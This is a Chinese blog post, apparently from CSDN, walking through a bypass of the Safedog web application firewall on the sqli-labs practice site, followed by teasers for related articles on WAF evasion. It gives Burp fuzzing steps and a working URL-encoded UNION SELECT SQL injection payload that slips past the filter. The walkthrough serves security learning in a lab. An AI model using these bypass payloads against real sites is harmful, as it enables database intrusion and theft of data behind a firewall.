过waf的小思路-安全狗

最新推荐文章于 2024-08-28 16:35:07 发布
最新推荐文章于 2024-08-28 16:35:07 发布
阅读量532 收藏 3
点赞数 1
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42478365/article/details/124598075
版权

1.在安装好的sqli-labs-master的第一关中输入?id=1,可以看到显示出用户名与密码
在这里插入图片描述
2.输入?id=1’ 可以看出存在sql注入漏洞
在这里插入图片描述
3.当输入?id=1’ and 1=1时,可以看出当前页面被安全狗拦截
在这里插入图片描述
4.开启Burp抓包,对空格进行暴力破解可以看到当空格为/*/~*/ 时,绕过安全狗。
在这里插入图片描述
5.输入order by发现在当前列有三列
在这里插入图片描述

在这里插入图片描述
6.使用联合语句进行sql注入,union/*/~*/select/*/~*/1,2,3--+,发现被安全狗拦截。
在这里插入图片描述
7.使用BurpSuite对进行标注/*/~*/
在这里插入图片描述
8.设置有效载荷类型为爆破,字符集为特殊字符;其余两个同样。
在这里插入图片描述
9.点击长度发现&=/与其它长度不同。
在这里插入图片描述
10测试发现成功绕过waf,注意:需要将&=/进行url编码。
![!](https://img-blog.csdnimg.cn/7e5e044752ff418ab6381913c81872b0.png)
11.输入?id=-1'/*%26%3d%2f*/union/*%26%3d%2f*/select/*%26%3d%2f*/1,2,user/*%26%3d%2f*/()--+,发现页面显示出数据库的名字。
在这里插入图片描述
安全狗对information_schema拦截比较厉害,目前还没有找到绕过得办法,以后补上

冯·诺依曼
关注
43-5 waf绕过 - 安全狗简介及安装
weixin_43263566的博客
06-01 426
安装安全狗需要开启 Apache 系统服务。如果 Apache 系统服务未开启,安装过程中可能会出现无法填入服务名称的问题,导致无法继续安装。为避免此问题,可以先在虚拟机中安装 PHPStudy。链接:https://pan.baidu.com/s/1LsT0AwVP5DKO7-WJ3zHo0Q?下载、安装phpstudy并启动(安装过程可以一路下一步,也可以改安装路径)
WAF相关知识及安全狗的部署和绕过
北冥同学的成长记录笔记
07-16 4556
WAFWeb应用程序防火墙通过过滤和监视Web应用程序与Internet之间的HTTP通信来帮助保护Web应用程序,Web Application Firewall (WEB 应用防护系统)。
应用安全-安全设备-Waf系列-Waf-安全狗(Safedog)
weixin_30855099的博客
08-15 670
安装 - Linux 下载 http://download.safedog.cn/safedog_linux64.tar.gz wget http://download.safedog.cn/safedog_linux64.tar.gz 解压 tar xvf safedog_linux64.tar 运行 ./install.py 卸载 进入安装包解压目录...
安全狗waf
m0_62207482的博客
12-20 1415
如果用了WAF之后,网页动不动就被拦截,比如我是用户,用户名是and,然后我就被拦截了;WAF一般都是通用的,并不是单独定制的,也就是说在拦截上会比较谨慎,所以WAF的拦截规则对应的正则一般是搭配式的,比如 and 1=1会被拦截,但是单独的and和单独的1=1不会被拦截。注意此时,不能拼接eval,因为eval()不是函数!使用相同IP的主机浏览器访问,会出现“您的请求过于频繁,已被网站管理员设置拦截!在防护日志中显示“不允许的HTTP请求”,拦截原因:进行了不允许的HTTP请求(HEAD请求)。
WAF剖析】——文件上传之安全狗bypass
Demo不是emo的博客
11-25 8290
文件上传的WAF你见过吗,关注我,让我带你由简入难实战各个WAF,今天先来看看web安全渗透必会的安全狗WAF,你会绕吗?看我带你将它拿下
堆叠注入,waf绕过 安全狗为主(18)
san3144393495的博客
05-06 439
讲这个例子,堆叠注入他的一个用处,注入的时候需要获取到管理员的账户密码,但密码是加密的,加密经常揭秘不出来,很正常,可以利用这个注入实现堆叠注入,就是插入数据,诸如的时候向管理员这个表里面插入一个数据,成功的给管理员添加一个新用户,之后在用插入的用户名密码去登陆,就不需要考虑密码解不出来。基本上一些常见漏洞都检测,他的检测是插件的那种方法,每次更新也都是更新的插件,他会对还会对工具检测的一些常见的工具,nmap,菜刀,sqlmap,和xxs漏洞检测等基本上的都会检测,默认的检测项目是url。
SQL注入绕过安全狗waf防火墙,这一篇就够了,8k文案超详细
xt350488的博客
07-16 5416
通过本文的详细解析和实验,我们深入了解了SQL注入攻击的基本原理及其在实际应用中的变种和绕过技巧。在面对如安全狗这样的WAF防护时,攻击者并非束手无策,而是可以通过多种方式绕过检测规则,成功实施SQL注入攻击。本文首先通过基础的SQL注入测试,验证了安全狗WAF对“and 1=1”等简单SQL注入模式的识别能力。随后,通过拆分和注释符的使用,我们发现WAF可能是通过识别特定模式(如“and”后紧跟空格和字符)来拦截SQL注入的。
网络安全最新深入waf绕过 (云盾,宝塔,安全狗)(19)(1)
2401_84254364的博客
05-04 823
说明现在这个也不行了,开始会对里面的内容进行检测。第四种 爬虫白名单。
sql注入绕过安全狗4.0
Bu2n的博客
02-07 5699
1.前言2.前置知识3.绕过关键字主要思路3.1绕过连体关键字思路3.2绕过单个关键字思路4.以sqli-labs(Less-1)为例,绕过安全狗4.1拦截order by4.2拦截union select4.3拦截database()4.4拦截from4.5拦截and4.6查看数据库数据5.面向安全狗4.0的py脚本6.sqli-labs无安全狗全通关payload 1.前言 该文章只进行技术分享与探讨,任何人进行非法操作与作者无关。 2.前置知识 /*!*/叫做内联注释,当!后面所接的数据库版本号时.
【网络安全waf绕过--打狗棒法
Yb528970805的博客
09-11 209
分块传输编码是超文本传输协议(HTTP)中的一种数据传输机制,允许HTTP由应用服务器向客户端发送的数据分成多个部分,在消息头中指定 Transfer-Encoding: chunked 就表示整个response将使分块传输编译来传输内容。一个消息块由n块组成,并在最后一个大小为0的块结束。Content-Type:互联网媒体类型, 也叫MIME类型,在HTTP的协议消息头中,使用Content-Type来表示请求和响应中的媒体数据格式标签,用于区分数据类型。
SQL注入绕过安全狗waf防火墙,这一篇就够了,8k文案超详细_mysql注入绕waf
最新发布
baimao__Ch的博客
08-28 1243
WAFWeb应用防火墙)作为一种专为Web应用程序设计的安全防护工具,其核心功能在于通过实施一系列针对HTTP/HTTPS协议的安全策略,来增强Web应用的安全性。WAF内置了精心设计的检测逻辑与规则集,这些规则旨在对每一个进入系统的请求内容进行细致审查,并对任何违反安全策略的请求采取即时且有效的防御措施,从而维护Web应用环境的纯净与安全。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
php大马过waf
04-28
php大马过waf,,......................................................................................................
菜刀php过waf
weixin_34221073的博客
06-15 520
关于PHP 一、waf为啥会拦截菜刀。菜刀在连接时,会向server端POST数据,抓包查看:会看到他向server端post了 @eval(base64_decode($_POST[z0])); 一般的waf都会拦截eval的。 二、要想菜刀仍然正常工作,就必须让菜刀中的内置的@eval(base64_decode($_POST[z0]));代码不被waf拦截,但又可以传递到server端。...
BypassWAF安全狗以及手工注入大全
Grey的博客
03-24 2146
过狗姿势①HPP参数污染使用多个无用的值或者重复的值打到攻击效果②双文件上传1.txt1.php覆盖前个文件SQL手工注入大全都知道'报错是手工注入的一种方法,但是为什么要手工注入呢?因为让第一条数据报错,就可以执行第二条语句联合注入法查询表名查询列名正则匹配查询布尔值注入主要是and的问题‘1’=‘1’的话,会返回一个正常的页面如果user()=本地用户的时候,结果如下如下显示失败count用法...
waf绕过
lansefly1990的专栏
05-15 353
https://xz.aliyun.com/t/2739 https://github.com/LandGrey/webshell-detect-bypass/blob/master/docs/asp-webshell-detect-bypass/asp-webshell-detect-bypass.md
有关waf绕过
Cou1d的博客
03-14 148
WAF检测工具: https://github.com/EnableSecurity/wafw00f Sqlmap 检测waf: python3 sqlmap.py-u“http://www.victim.org/ex.php?id=1”--identify-waf sqlmap过waf: 脚本的完整列表地址在sqlmap/tamper。参数--tamper sqlmap.py...
绕过WAF安全狗知识整理
aiquan9342的博客
10-26 302
0x01 前言 目前市场上的WAF主要有以下几类 1. 以安全狗为代表的基于软件WAF 2. 百度加速乐、安全宝等部署在云端的WAF 3. 硬件WAF WAF的检测主要有三个阶段,我画了一张图进行说明 本文主要总结的就是针对上面的三个阶段的绕过策略。小菜一枚,欢迎拍砖。 0x02 WAF身份认证阶段的绕过 WAF是有一个白名单的,在白名单内的客户请求将不做检测 ...
绕过安全狗_某教程学习笔记(一):23、WAF绕过
weixin_29166013的博客
01-11 521
我睡了一下午,醒的时候发现,屋子里黑漆漆的,一点声音都没有,抬头望了望窗户,天还没完全黑,四处摸摸,在枕头下找到手机,打开屏幕,干净,没有一条信息。。。一、目录扫描绕过WAF1、dirbuster扫描,默认的UA为:DirBuster-0.12 (http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project)2、安全狗会拦截访问请求...
WAF - 文件上传绕过安全狗 靶场实战
weixin_54771278的博客
05-29 955
实验介绍 1. 文件上传漏洞简介 在文件上传的功能处,若服务端脚本语言未对上传的文件进行严格验证和过滤,导致恶意用户上传恶意的脚本文件时,就有可能获取执行服务端命令的能力,这就是文件上传漏洞。 文件上传漏洞对Web应用来说是一种非常严重的漏洞。一般情况下,Web应用都会允许用户上传一些文件,如头像、附件等信息,如果Web应用没有对用户上传的文件进行有效的检查过滤,那么恶意用户就会上传一句话木马等Webshell,从而达到控制Web网站的目的 2. WAF工作原理 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值